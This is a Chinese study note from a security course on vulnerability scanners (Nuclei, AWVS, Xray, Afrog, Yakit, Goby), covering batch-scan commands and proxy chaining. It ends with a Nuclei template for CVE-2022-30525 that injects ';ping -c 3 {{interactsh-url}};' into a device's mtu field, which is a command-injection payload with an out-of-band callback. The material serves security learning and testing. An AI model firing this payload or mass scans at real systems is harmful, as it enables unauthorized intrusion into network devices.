第101天:漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动

goby

老朋友了~

Nuclei

1
2
3
4
5
6
官网地址:https://nuclei.projectdiscovery.io/
项目下载:https://github.com/projectdiscovery/nuclei

官方Nuclei-Templates&第三方Nuclei-Templates:
https://github.com/projectdiscovery/nuclei-templates
https://github.com/ExpLangcn/NucleiTP

批量扫描:

1
nucle -l urls.txt

扫描单个目标

1
nuclei -target xxx.com

加载对应的poc脚本,可以是当前路径下

1
2
nuclei -t ./test/
nuclei -t ./test/test.yaml

推荐使用,批量检测urls.txt,poc为test.yaml,输出结果result.txt

1
2
nuclei -l urls.txt -t test.yaml -o result.txt
#这种是针对某个漏洞的批量测试

AWVS

同样是老朋友了,但是感觉不好用。emmm,可以和xray进行互补,awvs爬虫比较强劲。

Xray

前面的就介绍过很多次了,是一款被动扫描的工具,可以和burp进行联动。也可以和awvs,或者是:awvs+burp+xray进行联动扫描。

1
2
3
4
AWVS指向代理-->burp-->xray

#常用命令
.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

Afrog

项目地址:https://github.com/zan8in/afrog

2023的小迪说这款工具会是热门,但是好像并没有火起来。

扫描单个目标

1
afrog -t http://example.com -o result.html

扫描多个目标

1
afrog -T urls.txt -o result.html

测试单个PoC

1
afrog -t http://example.com -P ./testing/poc-test.yaml -o result.html

测试多个PoC

1
afrog -t http://example.com -P ./testing/ -o result.html

Yakit

和Burp很像,但是他比burp更加综合化,他上面有自己的插件仓库,不用别人从其他地方进行插件的安装,不错的工具。

官方地址:https://www.yaklang.com/

针对网上没有的集成的yaml,但是有POC的漏洞

如何将这样的集成到自己的漏洞库中,这样就要学习怎么写对应工具的poc是什么写法,这里用第一个cve漏洞来演示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
id: CVE-2022-30525
info:
name: cx
author: remote
severity: high
tags: CVE-2022-30525
reference: CVE-2022-30525
requests:
- raw:
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host: {{Hostname}} #这里是批量测试目标地址,使用post的方式发送
Content-Type: application/json; charset=utf-8

{"command": "setWanPortSt","proto": "dhcp","port": "1270","vlan_tagged": "1270","vlanid": "1270","mtu": "{{exploit}}","data":""} #这里是payload

payloads:
exploit:
- ";ping -c 3 {{interactsh-url}};" #如果有带外dnslog的需求就会把参数代入到这里
attack: pitchfork
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"

参考文章:https://blog.csdn.net/weixin_43080961/article/details/124776553

image-20250905155731480